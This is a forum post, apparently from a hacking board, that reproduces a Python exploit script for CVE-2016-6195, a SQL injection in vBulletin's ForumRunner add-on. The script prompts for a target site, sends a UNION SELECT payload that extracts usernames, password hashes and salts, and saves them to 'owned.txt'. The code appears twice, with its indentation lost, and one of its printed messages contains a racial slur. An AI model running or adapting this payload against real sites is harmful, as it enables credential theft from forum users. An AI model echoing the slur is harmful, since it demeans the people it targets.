Cve-2016-6195

Pudeopie · 06-03-2025, 11:54 AM

import os,sys,urllib,time,requests
from bs4 import BeautifulSoup
from termcolor import colored, cprint

if os.name == 'posix':
os.system ('clear')
else:
os.system('cls')

banner = '''
+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+
vBulletin <=4.2.3 - 'ForumRunner' SQL Injection
+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+
CVE-2016-6195
Vulnerability Discovered By Dantalion
Exploiter Coded By Chaitanya Haritash @Indi_G34r

requirements : bs4, termcolor, urllib, requests

usage : ./exploit.py

print banner

class Exploit:
def __init__(self,):
print ""
def damn(self,):

print ""

if __name__ == "__main__":

print ""
private = str(raw_input('T4rg3t S!t3 > '))
poc = str(private)+"/"+"request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password,0 x3a,salt))))x),5,6,7,8,9,10-- -"
done = urllib.urlopen(poc)
print ""
print "[*] Onto it nigga

[*]"
print""
print ""
r = requests.get(poc)
soup = BeautifulSoup(r.content, "lxml")

cool = colored ("""
[!] Users Found from DB ::: URL : [!]

%s

gathering items in owned.txt :

""" , 'cyan')%private
print cool
print ""
try :
t_data = soup.find_all("div", {"class": "blockrow restore"})
for item in t_data:
# print item.text
f = open('owned.txt' , 'w')
g = item.text.encode('utf-8')
f.write(g)
f.close
print ""
print colored ("[+] Check for owned.txt in same dir of exploit [+]" , "cyan")

finally:
print ""
print ""
print "[+] Exiting [+]"
else:
print "Site is Not Vulnerable"

Exploit()

06-03-2025, 11:54 AM	#1
Pudeopie Banned Join Date: May 2025 Posts: 0	Cve-2016-6195 import os,sys,urllib,time,requests from bs4 import BeautifulSoup from termcolor import colored, cprint if os.name == 'posix': os.system ('clear') else: os.system('cls') banner = ''' +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+ vBulletin <=4.2.3 - 'ForumRunner' SQL Injection +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+ CVE-2016-6195 Vulnerability Discovered By Dantalion Exploiter Coded By Chaitanya Haritash @Indi_G34r requirements : bs4, termcolor, urllib, requests usage : ./exploit.py print banner class Exploit: def __init__(self,): print "" def damn(self,): print "" if __name__ == "__main__": print "" private = str(raw_input('T4rg3t S!t3 > ')) poc = str(private)+"/"+"request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password,0 x3a,salt))))x),5,6,7,8,9,10-- -" done = urllib.urlopen(poc) print "" print "[] Onto it nigga []" print"" print "" r = requests.get(poc) soup = BeautifulSoup(r.content, "lxml") cool = colored (""" [!] Users Found from DB ::: URL : [!] %s gathering items in owned.txt : """ , 'cyan')%private print cool print "" try : t_data = soup.find_all("div", {"class": "blockrow restore"}) for item in t_data: # print item.text f = open('owned.txt' , 'w') g = item.text.encode('utf-8') f.write(g) f.close print "" print colored ("[+] Check for owned.txt in same dir of exploit [+]" , "cyan") finally: print "" print "" print "[+] Exiting [+]" else: print "Site is Not Vulnerable" Exploit()